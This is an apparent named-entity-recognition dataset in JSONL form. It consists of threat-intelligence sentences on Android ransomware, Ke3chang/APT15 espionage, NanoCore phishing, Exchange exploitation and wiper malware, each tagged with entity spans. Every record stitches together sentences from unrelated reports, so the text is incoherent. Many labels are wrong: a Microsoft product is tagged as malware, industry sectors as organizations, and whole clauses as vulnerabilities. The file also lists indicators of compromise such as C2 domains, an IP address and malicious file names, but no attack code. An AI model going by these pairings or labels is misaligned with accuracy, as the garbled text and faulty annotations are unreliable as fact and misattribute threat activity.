{"text": "Machine learning module indicates continuous evolution As mentioned , this ransomware is the latest variant of a malware family that has undergone several stages of evolution . FireEye gained visibility into one of 23 known command-and-control ( CnC ) servers operated by the Ke3chang actor for about one week . however TAU expects not only APT10 but also other threat actors will start to use them . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": [{"start": 177, "end": 184, "label": "Organization"}, {"start": 224, "end": 243, "label": "System"}, {"start": 246, "end": 249, "label": "System"}, {"start": 276, "end": 290, "label": "Organization"}, {"start": 320, "end": 323, "label": "Organization"}, {"start": 341, "end": 346, "label": "Organization"}, {"start": 401, "end": 432, "label": "Organization"}, {"start": 478, "end": 529, "label": "Organization"}]}
{"text": "The knowledge graph below shows the various techniques this ransomware family has been seen using , including abusing the system alert window , abusing accessibility features , and , more recently , abusing notification services . Each attack comprises a variety of phases , including reconnaissance , exploitation , command and control , lateral movement , and exfiltration . Unfortunately , \u2022 Identify and investigate the creation , transfer , and/or execution of unauthorized Python - packaged executables ( e.g. , PyInstaller or Py2Exe ) on OT systems or systems with access to OT resources .", "spans": [{"start": 518, "end": 529, "label": "System"}, {"start": 533, "end": 539, "label": "System"}, {"start": 545, "end": 555, "label": "System"}, {"start": 559, "end": 594, "label": "System"}]}
{"text": "This ransomware family \u2019 s long history tells us that its evolution is far from over . The Ke3chang attackers have been active since at least 2010 . in order to break the techniques we have to understand both of the obfuscation mechanisms and disassembler tool internals before we can automate the process . This includes hosting C&C domains that were used by Winnti such as mtrue.com , shenqi[.]kr and zhu[.]kr .", "spans": [{"start": 91, "end": 99, "label": "Organization"}, {"start": 100, "end": 109, "label": "Organization"}, {"start": 322, "end": 413, "label": "Indicator"}]}
{"text": "We expect it to churn out new variants with even more sophisticated techniques . traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . TAU modified the original HexRaysDeob to make it work for APT10 ANEL obfuscations . In the case of a traditional ProxyNotShell exploit chain , the attack sequence is done in two steps :", "spans": [{"start": 108, "end": 117, "label": "Organization"}, {"start": 120, "end": 126, "label": "Organization"}, {"start": 129, "end": 139, "label": "Organization"}, {"start": 142, "end": 151, "label": "Organization"}, {"start": 154, "end": 173, "label": "Organization"}, {"start": 180, "end": 189, "label": "Organization"}, {"start": 192, "end": 205, "label": "Organization"}, {"start": 208, "end": 222, "label": "Organization"}, {"start": 225, "end": 228, "label": "Organization"}, {"start": 251, "end": 262, "label": "System"}, {"start": 283, "end": 288, "label": "Organization"}, {"start": 289, "end": 293, "label": "Malware"}]}
{"text": "In fact , recent variants contain code forked from an open-source machine learning module used by developers to automatically resize and crop images based on screen size , a valuable function given the variety of Android devices . The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors . The modified code is available publically here . We highly suspect the \u201c Pig network \u201d to have also been used as a bulletproof hosting service for cybercriminals who are unrelated to the Winnti group .", "spans": [{"start": 213, "end": 220, "label": "System"}, {"start": 235, "end": 243, "label": "Organization"}, {"start": 328, "end": 337, "label": "Organization"}, {"start": 340, "end": 346, "label": "Organization"}, {"start": 349, "end": 359, "label": "Organization"}, {"start": 362, "end": 371, "label": "Organization"}, {"start": 374, "end": 393, "label": "Organization"}, {"start": 396, "end": 405, "label": "Organization"}, {"start": 408, "end": 421, "label": "Organization"}, {"start": 424, "end": 438, "label": "Organization"}, {"start": 514, "end": 525, "label": "System"}, {"start": 556, "end": 583, "label": "System"}, {"start": 628, "end": 640, "label": "Organization"}]}
{"text": "The frozen TinyML model is useful for making sure images fit the screen without distortion . August 2013 , FireEye gained visibility on one of 22 CnC servers used at that time by the Ke3chang attackers . The summary of the modifications is : What the team uncovered was that the former MiniDuke attackers were still active , and using extremely effective social engineering techniques involving sending malicious PDF documents to compromise their victims .", "spans": [{"start": 11, "end": 17, "label": "System"}, {"start": 107, "end": 114, "label": "Organization"}, {"start": 183, "end": 191, "label": "Organization"}, {"start": 192, "end": 201, "label": "Organization"}, {"start": 275, "end": 304, "label": "Organization"}]}
{"text": "In the case of this ransomware , using the model would ensure that its ransom note\u2014typically fake police notice or explicit images supposedly found on the device\u2014would appear less contrived and more believable , increasing the chances of the user paying for the ransom . In this report , we present the historical intelligence we have gathered on the Ke3chang campaign , as well as an in-depth assessment of the ongoing Syrian-themed attacks against these MFAs . New patterns and data-flow tracking for opaque predicates . An adversary could potentially instruct a control systems device to perform an action that will cause an Impact", "spans": [{"start": 523, "end": 634, "label": "Vulnerability"}]}
{"text": "The library that uses tinyML is not yet wired to the malware \u2019 s functionalities , but its presence in the malware code indicates the intention to do so in future variants . Ke3chang attackers have used spear-phishing emails . Analysis in multiple maturity levels , One interesting detail about Hack520 is his apparent love for pigs , as seen in his use of the word in his email addresses .", "spans": [{"start": 22, "end": 28, "label": "System"}, {"start": 174, "end": 182, "label": "Organization"}, {"start": 183, "end": 192, "label": "Organization"}, {"start": 295, "end": 302, "label": "Organization"}]}
{"text": "We will continue to monitor this ransomware family to ensure customers are protected and to share our findings and insights to the community for broad protection against these evolving mobile threats . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . considering multiple control flow dispatchers and various jump cases for control flow flattening . The leaked tooling included a Python script , , that when executed led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks .", "spans": [{"start": 202, "end": 210, "label": "Organization"}, {"start": 232, "end": 259, "label": "Vulnerability"}, {"start": 262, "end": 275, "label": "Vulnerability"}, {"start": 321, "end": 335, "label": "Malware"}, {"start": 338, "end": 351, "label": "Vulnerability"}, {"start": 358, "end": 374, "label": "System"}, {"start": 377, "end": 390, "label": "Vulnerability"}, {"start": 524, "end": 537, "label": "System"}, {"start": 565, "end": 588, "label": "Organization"}, {"start": 606, "end": 610, "label": "Indicator"}, {"start": 631, "end": 654, "label": "Organization"}]}
{"text": "Protecting organizations from threats across domains and platforms Mobile threats continue to rapidly evolve , with attackers continuously attempting to sidestep technological barriers and creatively find ways to accomplish their goal , whether financial gain or finding an entry point to broader network compromise . Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download . The tool can work for almost all obfuscated functions in the tested sample . Mandiant is investigating multiple instances of successful exploitation of CVE-2023 - 4966 that resulted in the takeover of legitimate user sessions on NetScaler ADC and Gateway appliances .", "spans": [{"start": 338, "end": 346, "label": "Organization"}, {"start": 347, "end": 356, "label": "Organization"}, {"start": 610, "end": 625, "label": "Vulnerability"}]}
{"text": "This new mobile ransomware variant is an important discovery because the malware exhibits behaviors that have not been seen before and could open doors for other malware to follow . Over the years , the Ke3chang attackers have used three types of malware that we call : \" BS2005 \" , \" BMW \" , and \" MyWeb \" . This implementation will deobfuscate approximately 89% of encountered functions . The next is to call with expecting it to return 0 as it is likely to have an environment variable name like that .", "spans": [{"start": 203, "end": 211, "label": "Organization"}, {"start": 212, "end": 221, "label": "Organization"}, {"start": 272, "end": 278, "label": "System"}, {"start": 285, "end": 288, "label": "System"}, {"start": 299, "end": 304, "label": "System"}]}
{"text": "It reinforces the need for comprehensive defense powered by broad visibility into attack surfaces as well as domain experts who track the threat landscape and uncover notable threats that might be hiding amidst massive threat data and signals . it is a typical first stage backdoor commonly found in APT attacks . This provides researchers and analyst broad tool to attack this type of obfuscation , We note that the MicroSCADA control system became a Hitachi Energy product in 2022 after a divestiture from ABB .", "spans": [{"start": 417, "end": 427, "label": "System"}, {"start": 452, "end": 474, "label": "Organization"}, {"start": 508, "end": 511, "label": "Organization"}]}
{"text": "Microsoft Defender for Endpoint on Android , now generally available , extends Microsoft \u2019 s industry-leading endpoint protection to Android . The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . and if it adopted in other families . Actors behind many of these new ransomware variants , including Sirattacker , Chaos 2.0 , Chaos 4.0 , DCrypt , and Shadow Men Team , are demanding payments ranging from USD $ 3.50 to $ 4,390 in Bitcoin from victims .", "spans": [{"start": 0, "end": 18, "label": "System"}, {"start": 35, "end": 42, "label": "System"}, {"start": 79, "end": 88, "label": "Organization"}, {"start": 133, "end": 140, "label": "System"}, {"start": 147, "end": 156, "label": "Organization"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 253, "end": 259, "label": "Organization"}, {"start": 262, "end": 272, "label": "Organization"}, {"start": 275, "end": 284, "label": "Organization"}, {"start": 287, "end": 306, "label": "Organization"}, {"start": 313, "end": 322, "label": "Organization"}, {"start": 325, "end": 338, "label": "Organization"}, {"start": 341, "end": 355, "label": "Organization"}, {"start": 460, "end": 471, "label": "Organization"}, {"start": 474, "end": 485, "label": "Organization"}, {"start": 486, "end": 495, "label": "Organization"}, {"start": 498, "end": 504, "label": "Organization"}, {"start": 511, "end": 526, "label": "Organization"}]}
{"text": "It detects this ransomware ( AndroidOS/MalLocker.B ) , as well as other malicious apps and files using cloud-based protection powered by deep learning and heuristics , in addition to content-based detection . All of the CnC communications are performed over the HTTP protocol . In should be noted that the tool may not work for the updated versions of ANEL if they are compiled with different options of the obfuscating compiler . Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": [{"start": 29, "end": 50, "label": "Indicator"}, {"start": 262, "end": 275, "label": "System"}, {"start": 352, "end": 356, "label": "Organization"}, {"start": 523, "end": 557, "label": "Malware"}]}
{"text": "It also protects users and organizations from other mobile threats , such as mobile phishing , unsafe network connections , and unauthorized access to sensitive data . The current Ke3chang campaign leverages the BS2005 malware , while older activity from 2010 - 2011 leveraged BMW , followed by the MyWeb malware sporadically used in between . Testing in multiple versions is important , DarkRace is a new ransomware group first discovered by researcher S!Ri .", "spans": [{"start": 212, "end": 226, "label": "System"}, {"start": 277, "end": 280, "label": "System"}, {"start": 299, "end": 312, "label": "System"}, {"start": 388, "end": 396, "label": "Organization"}, {"start": 454, "end": 458, "label": "Organization"}]}
{"text": "Learn more about our mobile threat defense capabilities in Microsoft Defender for Endpoint on Android . A trait common to all three malware families we analyzed is that they use the IWebBrowser2 COM interface to perform their CnC communication . so TAU is looking for newer versions ANEL samples . Whoever hacked Ashley Madison had access to all employee emails , but they only released Biderman \u2019s messages \u2014 three years worth .", "spans": [{"start": 59, "end": 77, "label": "System"}, {"start": 94, "end": 101, "label": "System"}, {"start": 182, "end": 198, "label": "System"}, {"start": 249, "end": 252, "label": "Organization"}, {"start": 283, "end": 287, "label": "Organization"}, {"start": 313, "end": 327, "label": "Organization"}]}
{"text": "Malware , phishing , and other threats detected by Microsoft Defender for Endpoint are reported to the Microsoft Defender Security Center , allowing SecOps to investigate mobile threats along with endpoint signals from Windows and other platforms using Microsoft Defender for Endpoint \u2019 s rich set of tools for detection , investigation , and response . Three months after the Olympics-themed attacks , FireEye observed a new BS2005 campaign labeled \" newtiger \" , which is possibly a reference to an older 2010 campaign labeled \" tiger \" . Please reach out to our unit if you have relevant samples or need assistance in deobfuscating the codes . Indicators of compromise aid information security and IT professionals in detecting data breaches , malware infections , or other threat activity .", "spans": [{"start": 51, "end": 69, "label": "System"}, {"start": 103, "end": 137, "label": "Organization"}, {"start": 219, "end": 226, "label": "System"}, {"start": 253, "end": 271, "label": "System"}, {"start": 403, "end": 410, "label": "Organization"}]}
{"text": "Threat data from endpoints are combined with signals from email and data , identities , and apps in Microsoft 365 Defender ( previously Microsoft Threat Protection ) , which orchestrates detection , prevention , investigation , and response across domains , providing coordinated defense . Using information from the FireEye DTI cloud , FireEye observed that Ke3chang targeted a single firm . Double Loaded Zip File Delivers Nanocore Most malware sent via emails is packaged in archives such as ZIP, RAR, and 7z ) . How The Command are executed The malware add to the user environment variables and creates a pipe for covert communication and receiving the output .", "spans": [{"start": 100, "end": 122, "label": "System"}, {"start": 136, "end": 163, "label": "System"}, {"start": 317, "end": 328, "label": "Organization"}, {"start": 337, "end": 344, "label": "Organization"}, {"start": 359, "end": 367, "label": "Organization"}, {"start": 456, "end": 462, "label": "System"}, {"start": 545, "end": 556, "label": "Malware"}, {"start": 557, "end": 594, "label": "Malware"}, {"start": 599, "end": 638, "label": "Malware"}, {"start": 643, "end": 663, "label": "Malware"}]}
{"text": "Microsoft Defender for Endpoint on Android further enriches organizations \u2019 visibility into malicious activity , empowering them to comprehensively prevent , detect , and respond to against attack sprawl and cross-domain incidents . The Ke3chang attackers used the older \" MyWeb \" malware family from 2010 to 2011 . Occasionally, we encounter some clever and creative ways these malicious archives are . CADDYWIPER will attempt to wipe all files before proceeding to wipe any mapped drives .", "spans": [{"start": 0, "end": 18, "label": "System"}, {"start": 35, "end": 42, "label": "System"}, {"start": 237, "end": 245, "label": "Organization"}, {"start": 246, "end": 255, "label": "Organization"}, {"start": 273, "end": 278, "label": "System"}, {"start": 404, "end": 414, "label": "Malware"}]}
{"text": "Technical analysis Obfuscation On top of recreating ransomware behavior in ways we haven \u2019 t seen before , the Android malware variant uses a new obfuscation technique unique to the Android platform . The Ke3chang attackers used the older MyWeb malware family from 2010 to 2011 . Here we will examine an example of an oddly formatted ZIP archive hiding the NanoCore . The group 's 91 attacks come not long after their extensive GoAnywhere campaign in March , when they hit over 100 organizations using a nasty zero - day .", "spans": [{"start": 111, "end": 118, "label": "System"}, {"start": 182, "end": 189, "label": "System"}, {"start": 205, "end": 213, "label": "Organization"}, {"start": 214, "end": 223, "label": "Organization"}, {"start": 239, "end": 252, "label": "System"}, {"start": 357, "end": 365, "label": "Malware"}, {"start": 368, "end": 391, "label": "Organization"}, {"start": 428, "end": 438, "label": "Organization"}, {"start": 504, "end": 520, "label": "Malware"}]}
{"text": "One of the tell-tale signs of an obfuscated malware is the absence of code that defines the classes declared in the manifest file . During our period of visibility into the BS2005 \" moviestar \" campaign against various ministries of foreign affairs in Europe , FireEye discovered that the Ke3chang had initially tested the malware in virtual machines , prior to compromising actual targets . We spotted a courier themed spam campaign on our Secure Email Gateway (SEG ) cloud . After further research , we were able to link Hack520 to different network administration activities , notably with a Virtual Private Server ( VPS ) hosting service .", "spans": [{"start": 219, "end": 248, "label": "Organization"}, {"start": 261, "end": 268, "label": "Organization"}, {"start": 289, "end": 297, "label": "Organization"}, {"start": 441, "end": 461, "label": "System"}, {"start": 462, "end": 466, "label": "System"}, {"start": 523, "end": 530, "label": "Organization"}, {"start": 595, "end": 641, "label": "System"}]}
{"text": "The classes.dex has implementation for only two classes : The main application class gCHotRrgEruDv , which is involved when the application opens A helper class that has definition for custom encryption and decryption This means that there \u2019 s no code corresponding to the services declared in the manifest file : Main Activity , Broadcast Receivers , and Background . The MyWeb sample that FireEye analyzed has a compile date of 1/20/2011 . The message claimed to be from an Export Operation Specialist of USCO Logistics and that it was sent as per their customer . Collect NSPPE core dump files from NetScaler .", "spans": [{"start": 373, "end": 385, "label": "System"}, {"start": 391, "end": 398, "label": "Organization"}, {"start": 507, "end": 521, "label": "Organization"}]}
{"text": "How does the malware work without code for these key components ? At least one of the attacks in this campaign leveraged a European security and defense-themed lure , which aligns with the targeting preferences for this group . Aside from this, there were several other suspicious items we noted: Headers mismatched: The Reply-To and From email address were . But while it was clear earlier on that attackers were actively exploiting CVE-2023 - 34362 , it was only a few days later that it became clear that Cl0p was behind the attacks .", "spans": [{"start": 220, "end": 225, "label": "Organization"}, {"start": 339, "end": 344, "label": "System"}, {"start": 434, "end": 450, "label": "Vulnerability"}, {"start": 508, "end": 512, "label": "Organization"}]}
{"text": "As is characteristic for obfuscated threats , the malware has encrypted binary code stored in the Assets folder : When the malware runs for the first time , the static block of the main class is run . MyWeb is the second-generation malware used by Ke3chang . Furthermore, the email address used in Reply-To is from a free email client . This new ransomware variant does n't have any novel features or functionality and points to the challenges organizations are facing as the landscape continues to shift and a plethora of new actors join their ranks .", "spans": [{"start": 201, "end": 206, "label": "System"}, {"start": 248, "end": 256, "label": "Organization"}, {"start": 276, "end": 281, "label": "System"}, {"start": 322, "end": 327, "label": "System"}, {"start": 337, "end": 414, "label": "Malware"}]}
{"text": "The code is heavily obfuscated and made unreadable through name mangling and use of meaningless variable names : Decryption with a twist The malware uses an interesting decryption routine : the string values passed to the decryption function do not correspond to the decrypted value , they correspond to junk code to simply hinder analysis . ministries of foreign affairs in Europe have been targeted and compromised by a threat actor we call Ke3chang . Suspicious message body: The attachment was mentioned in the message body twice, making sure to direct the reader\u2019s attention towards the . The arrest makes him the third LockBit affiliate charged in the US since November .", "spans": [{"start": 342, "end": 371, "label": "Organization"}, {"start": 422, "end": 434, "label": "Organization"}, {"start": 443, "end": 451, "label": "Organization"}, {"start": 625, "end": 632, "label": "Organization"}]}
{"text": "On Android , an Intent is a software mechanism that allows users to coordinate the functions of different Activities to achieve a task . This attack used the crisis in Syria as a lure to deliver malware to its targets . Suspicious attachment name: The name of attachment SHIPPING_MX00034900_PL_INV_pdf.zip ends with pdf.zip . The group appears to commonly deploy double extortion of the victims that have been listed on the leak site , several of them have had some portion of their exfiltrated data exposed .", "spans": [{"start": 3, "end": 10, "label": "System"}, {"start": 271, "end": 305, "label": "Indicator"}, {"start": 316, "end": 323, "label": "Indicator"}, {"start": 410, "end": 433, "label": "Organization"}]}
{"text": "It \u2019 s a messaging object that can be used to request an action from another app component . Tracking the malicious activities of the elusive Ke3chang APT group , ESET researchers have discovered new versions of malware families linked to the group , and a previously unreported backdoor . That usually means that the name of the file inside the archive ends with 2 known file extensions \u201cpdf.<extension>\u201d (archiving tools usually defaults the <extension> to the archive\u2019s format e.g. ) . The malware is designed to cause electric power disruption by interacting with IEC 60870 - 5 - 104 ( IEC-104 ) devices , such as remote terminal units ( RTUs ) , that are commonly leveraged in electric transmission and distribution operations in Europe , the Middle East , and Asia .", "spans": [{"start": 142, "end": 150, "label": "Organization"}, {"start": 151, "end": 160, "label": "Organization"}, {"start": 163, "end": 167, "label": "Organization"}, {"start": 243, "end": 248, "label": "Organization"}, {"start": 568, "end": 607, "label": "System"}, {"start": 618, "end": 648, "label": "System"}]}
{"text": "The Intent object carries a string value as \u201c action \u201d parameter . Furthermore , FireEye has presented evidence indicating that the Ke3chang attackers have been active since at least 2010 and have attacked targets related to G20 meetings in the past . The attachment SHIPPING_MX00034900_PL_INV_pdf.zip makes this message stand . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": [{"start": 81, "end": 88, "label": "Organization"}, {"start": 132, "end": 140, "label": "Organization"}, {"start": 141, "end": 150, "label": "Organization"}, {"start": 225, "end": 237, "label": "Organization"}, {"start": 267, "end": 301, "label": "Indicator"}, {"start": 382, "end": 601, "label": "Malware"}]}
{"text": "The malware creates an Intent inside the decryption function using the string value passed as the name for the Intent . During our brief window of visibility into one of the known 22 CnC nodes , FireEye observed the Ke3chang conducting reconnaissance and moving laterally throughout the compromised networks . The ZIP file had a file size significantly greater than that of its uncompressed . These threats can come from internal employees , vendors , a contractor or a partnerand are viewed as some of the greatest cyber security threats to organizations .", "spans": [{"start": 195, "end": 202, "label": "Organization"}, {"start": 216, "end": 224, "label": "Organization"}, {"start": 421, "end": 439, "label": "Organization"}, {"start": 442, "end": 449, "label": "Organization"}, {"start": 454, "end": 464, "label": "Organization"}, {"start": 470, "end": 480, "label": "Organization"}, {"start": 542, "end": 555, "label": "Organization"}]}
{"text": "It then decrypts a hardcoded encrypted value and sets the \u201c action \u201d parameter of the Intent using the setAction API . Ke3chang attackers are operating within China . Typically, the size of the ZIP file should be less than the uncompressed content or, in some cases, ZIP files will grow larger than the original files by a reasonable number of . The second step is simply the same exploit used in the second step of ProxyNotShell , allowing code execution through PowerShell remoting .", "spans": [{"start": 119, "end": 127, "label": "Organization"}, {"start": 128, "end": 137, "label": "Organization"}, {"start": 432, "end": 483, "label": "Vulnerability"}]}
{"text": "Once this Intent object is generated with the action value pointing to the decrypted content , the decryption function returns the Intent object to the callee . In May 2017 , NCC Group 's Incident Response team reacted to an ongoing incident . ZIP archives are supposed to have one \u201cEnd of Central Directory\u201d (EOCD) signifying the end of the . In 2015 GReAT reported that CozyDuke often spear phishes targets with emails containing a link to a hacked website .", "spans": [{"start": 175, "end": 205, "label": "Organization"}, {"start": 352, "end": 357, "label": "Organization"}, {"start": 372, "end": 380, "label": "Malware"}]}
{"text": "The callee then invokes the getAction method to get the decrypted content . which provides a range of services to UK Government . Looking deeper into the structure of SHIPPING_MX00034900_PL_INV_pdf.zip , the attachment has two . Indicators of attack are not so much a static description of the attacker , but a dynamic profile of how an attacker interacts with your technologies and users .", "spans": [{"start": 114, "end": 127, "label": "Organization"}, {"start": 167, "end": 201, "label": "Indicator"}, {"start": 229, "end": 249, "label": "Indicator"}, {"start": 309, "end": 388, "label": "Indicator"}]}
{"text": "Payload deployment Once the static block execution is complete , the Android Lifecycle callback transfers the control to the OnCreate method of the main class . APT15 was targeting information related to UK government departments and military technology . After the first EOCD comes some extra data \u2013 another ZIP file . Initially engaged in espionage activity , Agrius deployed a set of destructive wiper attacks against Israeli targets , masquerading the activity as ransomware attacks .", "spans": [{"start": 69, "end": 86, "label": "System"}, {"start": 161, "end": 166, "label": "Organization"}, {"start": 207, "end": 217, "label": "Organization"}, {"start": 234, "end": 253, "label": "Organization"}, {"start": 362, "end": 368, "label": "Organization"}, {"start": 378, "end": 412, "label": "Organization"}, {"start": 421, "end": 436, "label": "Organization"}]}
{"text": "Malware code showing onCreate method Figure 9. onCreate method of the main class decrypting the payload Next , the malware-defined function decryptAssetToDex ( a meaningful name we assigned during analysis ) receives the string \u201c CuffGmrQRT \u201d as the first argument , which is the name of the encrypted file stored in the Assets folder . backdoors that now appear to be part of APT15 's toolset . It turns out that the first ZIP structure is for the image file order.jpg while the second one is for an executable file SHIPPING_MX00034900_PL_INV_pdf.exe . Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": [{"start": 230, "end": 240, "label": "Indicator"}, {"start": 377, "end": 382, "label": "Organization"}, {"start": 460, "end": 469, "label": "Indicator"}, {"start": 517, "end": 551, "label": "Indicator"}, {"start": 554, "end": 563, "label": "Organization"}]}
{"text": "Malware code showing decryption of assets Figure 10 . This report demonstrates that Ke3chang is able to successfully penetrate government targets using exploits for vulnerabilities that have already been patched and despite the fact that these ministries have defenses in place . Both are compressed when archived, and both indicate that they are the only file in their ZIP structures as indicated in their local file headers and EOCDs . We have observed individuals with managerial , digital marketing , digital media , and human resources roles in companies to have been targeted .", "spans": [{"start": 84, "end": 92, "label": "Organization"}, {"start": 127, "end": 137, "label": "Organization"}, {"start": 455, "end": 546, "label": "Organization"}]}
{"text": "Decrypting the assets After being decrypted , the asset turns into the .dex file . RoyalDNS - required APT15 . The image file \u201corder.jpg\u201d contained in the first ZIP structure is actually a non-malicious PNG formatted image . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": [{"start": 83, "end": 91, "label": "System"}, {"start": 103, "end": 108, "label": "Organization"}, {"start": 265, "end": 312, "label": "Vulnerability"}]}
{"text": "This is a notable behavior that is characteristic of this ransomware family . The Ke3chang group also used keyloggers and their own .NET tool to enumerate folders and dump data from Microsoft Exchange mailboxes . This serves as a decoy, an attempt to hide the content of the other ZIP . Does your organization possess any PII or regulated data such as payment card data , health care data , social security numbers or bank accounts Financially motivated attacks", "spans": [{"start": 82, "end": 96, "label": "Organization"}, {"start": 107, "end": 117, "label": "System"}, {"start": 132, "end": 141, "label": "System"}, {"start": 322, "end": 325, "label": "Organization"}]}
{"text": "Comparison of code of Asset file before and after decryption Figure 11 . APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets . The image file has been correctly identified by SEG as a PNG when its file extension is .jpg denoting a JPEG formatted . None on the CrowdStrike Falcon \u00ae console and of the market - leading CrowdStrike Falcon \u00ae platform in action .", "spans": [{"start": 73, "end": 78, "label": "Organization"}, {"start": 103, "end": 111, "label": "System"}, {"start": 259, "end": 263, "label": "Indicator"}, {"start": 304, "end": 322, "label": "System"}, {"start": 361, "end": 379, "label": "System"}]}
{"text": "Asset file before and after decryption Once the encrypted executable is decrypted and dropped in the storage , the malware has the definitions for all the components it declared in the manifest file . This time , APT15 opted for a DNS based backdoor : RoyalDNS . The second ZIP structure contains SHIPPING_MX00034900_PL_INV_pdf.exe , which is a NanoCore . The CozyDuke malware utilizes a backdoor and dropper , and exfiltrates data to a C2 server .", "spans": [{"start": 213, "end": 218, "label": "Organization"}, {"start": 231, "end": 249, "label": "System"}, {"start": 252, "end": 260, "label": "System"}, {"start": 297, "end": 331, "label": "Indicator"}, {"start": 345, "end": 353, "label": "Malware"}, {"start": 360, "end": 368, "label": "Malware"}, {"start": 437, "end": 446, "label": "System"}]}
{"text": "It then starts the final detonator function to load the dropped .dex file into memory and triggers the main payload . APT15 then used a tool known as RemoteExec . This remote access Trojan has the capability that allows an attacker to completely take control of the compromised . None Organizations should apply the November 8 , 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method .", "spans": [{"start": 118, "end": 123, "label": "Organization"}, {"start": 150, "end": 160, "label": "System"}, {"start": 182, "end": 188, "label": "Malware"}, {"start": 417, "end": 430, "label": "Vulnerability"}]}
{"text": "Malware code showing loading of decrypted dex file Figure 12 . APT15 then used a tool known as RemoteExec ( similar to Microsoft . It connects to its command and control server at 194.5.98.85 on port . Take the case of a research and development firm .", "spans": [{"start": 63, "end": 68, "label": "Organization"}, {"start": 95, "end": 105, "label": "System"}, {"start": 119, "end": 128, "label": "Organization"}, {"start": 180, "end": 191, "label": "Indicator"}, {"start": 221, "end": 250, "label": "Organization"}]}
{"text": "Loading the decrypted .dex file into memory and triggering the main payload Main payload When the main payload is loaded into memory , the initial detonator hands over the control to the main payload by invoking the method XoqF ( which we renamed to triggerInfection during analysis ) from the gvmthHtyN class ( renamed to PayloadEntry ) . Coincidentally , following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare , we have found evidence of very recent activity by a group referred to as APT15 , known for committing cyber espionage which is believed to be affiliated with the Chinese government . This NanoCore RAT is version 1.2.2.0 which has been found to be offered for free on the Dark Web just a few months . The threat actor targets individuals and employees that may have access to a Facebook Business account with an information - stealer malware .", "spans": [{"start": 391, "end": 395, "label": "Organization"}, {"start": 517, "end": 522, "label": "Organization"}, {"start": 538, "end": 543, "label": "Organization"}, {"start": 567, "end": 582, "label": "Organization"}, {"start": 653, "end": 661, "label": "Malware"}, {"start": 736, "end": 744, "label": "Organization"}, {"start": 769, "end": 781, "label": "Organization"}, {"start": 790, "end": 867, "label": "Organization"}]}
{"text": "Malware code showing handover from initial module to main payload Figure 13 . APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more . We used different archiving tools such as PowerArchiver 2019 , WinZip , WinRar , 7Zip , and unzIP S-TOOL that is built into the Windows OS in attempting to extract the content of the attachment SHIPPING_MX00034900_PL_INV_pdf.zip . While this shift likely reflects the increased tempo of wartime cyber operations , it also reveals the GRU \u2019s priority objectives in OT attacks .", "spans": [{"start": 78, "end": 83, "label": "Organization"}, {"start": 108, "end": 122, "label": "Organization"}, {"start": 237, "end": 249, "label": "Organization"}, {"start": 252, "end": 274, "label": "Organization"}, {"start": 277, "end": 285, "label": "Organization"}, {"start": 341, "end": 359, "label": "System"}, {"start": 362, "end": 368, "label": "System"}, {"start": 371, "end": 377, "label": "System"}, {"start": 380, "end": 384, "label": "System"}, {"start": 391, "end": 403, "label": "System"}, {"start": 427, "end": 434, "label": "System"}, {"start": 493, "end": 527, "label": "Indicator"}, {"start": 663, "end": 675, "label": "Organization"}]}
{"text": "Handover from initial module to the main payload As mentioned , the initial handover component called triggerInfection with an instance of appObj and a method that returns the value for the variable config . Other names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon . Among these 5 tools, only WinZip and Windows\u2019 unzIP S-TOOL were not able to extract anything from the ZIP file as they encountered an error at the start of the extraction . The hacking and defacement of a U.S. Government system in which the attackers post messages disparaging remarks about capitalism or democracy would be a solid example of hacktivism .", "spans": [{"start": 228, "end": 233, "label": "Organization"}, {"start": 238, "end": 249, "label": "Organization"}, {"start": 252, "end": 260, "label": "Organization"}, {"start": 263, "end": 272, "label": "Organization"}, {"start": 279, "end": 293, "label": "Organization"}, {"start": 322, "end": 328, "label": "System"}, {"start": 342, "end": 354, "label": "System"}, {"start": 501, "end": 523, "label": "Organization"}, {"start": 537, "end": 546, "label": "Organization"}]}
{"text": "Malware code showing definition of populateConfigMap Figure 14 . ther names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon . The other archiving tools were able to extract one file from the ZIP attachment \u2013 either order.jpg or SHIPPING_MX00034900_PL_INV_pdf.exe . CADDYWIPER was then executed as a scheduled task at a predetermined time .", "spans": [{"start": 84, "end": 89, "label": "Organization"}, {"start": 94, "end": 105, "label": "Organization"}, {"start": 108, "end": 116, "label": "Organization"}, {"start": 119, "end": 128, "label": "Organization"}, {"start": 135, "end": 149, "label": "Organization"}, {"start": 241, "end": 288, "label": "Indicator"}, {"start": 291, "end": 301, "label": "Malware"}]}
